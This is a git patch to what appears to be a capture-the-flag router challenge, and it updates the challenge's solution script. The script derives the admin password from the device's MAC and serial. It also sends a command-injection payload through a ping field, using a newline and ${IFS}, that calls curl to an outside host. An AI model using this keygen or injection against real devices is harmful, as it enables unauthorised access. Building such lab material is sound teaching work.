From 919a275fe33ae8dd5a03c9d6d88c2cba248c000c Mon Sep 17 00:00:00 2001 From: Giulio Date: Wed, 23 Sep 2020 11:13:38 +0200 Subject: [PATCH] DNS is useless; fix tar path in update.sh --- buildroot/board/tiesse/tgr/permissions.config | 2 +- conf/etc/dhcp/dhcpd.conf | 2 +- solution/solution.py | 81 ++++++++++--------- update/update.sh | 2 +- 4 files changed, 44 insertions(+), 43 deletions(-) diff --git a/buildroot/board/tiesse/tgr/permissions.config b/buildroot/board/tiesse/tgr/permissions.config index d326a35..bd7b03d 100644 --- a/buildroot/board/tiesse/tgr/permissions.config +++ b/buildroot/board/tiesse/tgr/permissions.config @@ -4,4 +4,4 @@ /update.sh f 755 root root - - - - - /root/ d 700 root root - - - - - /root/.ssh/ d 700 root root - - - - - -/root/.ssh/authorized_keys 644 root root - - - - - +/root/.ssh/authorized_keys f 644 root root - - - - - diff --git a/conf/etc/dhcp/dhcpd.conf b/conf/etc/dhcp/dhcpd.conf index b8bcf8b..b206c23 100644 --- a/conf/etc/dhcp/dhcpd.conf +++ b/conf/etc/dhcp/dhcpd.conf @@ -1,6 +1,6 @@ default-lease-time 600; max-lease-time 14400; -option domain-name-servers 1.1.1.1; +#option domain-name-servers 1.1.1.1; option subnet-mask 255.255.255.0; option broadcast-address 192.168.77.255; diff --git a/solution/solution.py b/solution/solution.py index 54b2161..f7a4146 100644 --- a/solution/solution.py +++ b/solution/solution.py @@ -1,40 +1,41 @@ -import requests -import hashlib - -def xorshift(x, y, z, w): - t = x - t = t ^ ((t << 11) & 0xFFFFFFFF) - t = t ^ (t >> 8) - x, y, z = y, z, w - w = (w ^ (w >> 19)) ^ t - return x, y, z, w, t - -def keygen(mac, serial): - l = 20 - password = "" - md5a = hashlib.md5(mac).hexdigest() - md5b = hashlib.md5(serial).hexdigest() - w = int(md5a[0:8], 16) - x = int(md5a[8:16], 16) - y = int(md5a[16:24], 16) - z = int(md5a[24:32], 16) - - for i in range(0, l): - x, y, z, w, t = xorshift(x, y, z, w) - password += md5b[t % 20] - - return password - -def rce(username, password, host, payload): - requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))}) - -def main(): - serial = "D7F2959E8EE66CC06CB67C0D2B835273".encode("ascii") - mac = "ac:35:ee:ad:29:1b".encode("ascii") - host = "192.168.77.1" - payload = "curl 192.168.1.2:8080" - password = keygen(mac, serial) - print(password) - #rce("admin", password, host, payload) - -main() \ No newline at end of file +import requests +import hashlib +import sys + +def xorshift(x, y, z, w): + t = x + t = t ^ ((t << 11) & 0xFFFFFFFF) + t = t ^ (t >> 8) + x, y, z = y, z, w + w = (w ^ (w >> 19)) ^ t + return x, y, z, w, t + +def keygen(mac, serial): + l = 20 + password = "" + md5a = hashlib.md5(mac).hexdigest() + md5b = hashlib.md5(serial).hexdigest() + w = int(md5a[0:8], 16) + x = int(md5a[8:16], 16) + y = int(md5a[16:24], 16) + z = int(md5a[24:32], 16) + + for i in range(0, l): + x, y, z, w, t = xorshift(x, y, z, w) + password += md5b[t % 20] + + return password + +def rce(username, password, host, payload): + requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))}) + +def main(): + serial = sys.argv[1].encode("ascii") + mac = sys.argv[2].encode("ascii") + host = "192.168.77.1" + payload = "curl 192.168.77.10:8080" + password = keygen(mac, serial) + print(password) + #rce("admin", password, host, payload) + +main() diff --git a/update/update.sh b/update/update.sh index d1af4aa..b3e5260 100755 --- a/update/update.sh +++ b/update/update.sh @@ -32,7 +32,7 @@ if [ "$check" == "Verified OK" ] then /bin/echo "[+] Signature is valid!" /bin/echo "[+] Upgrading..." - /usr/bin/tar -xvzf /tmp/update.tgz.cc -C / + /bin/tar -xvzf /tmp/update.tgz.cc -C / /bin/rm /tmp/update.tgz.cc /tmp/sig /bin/echo "[+] Done" exit 0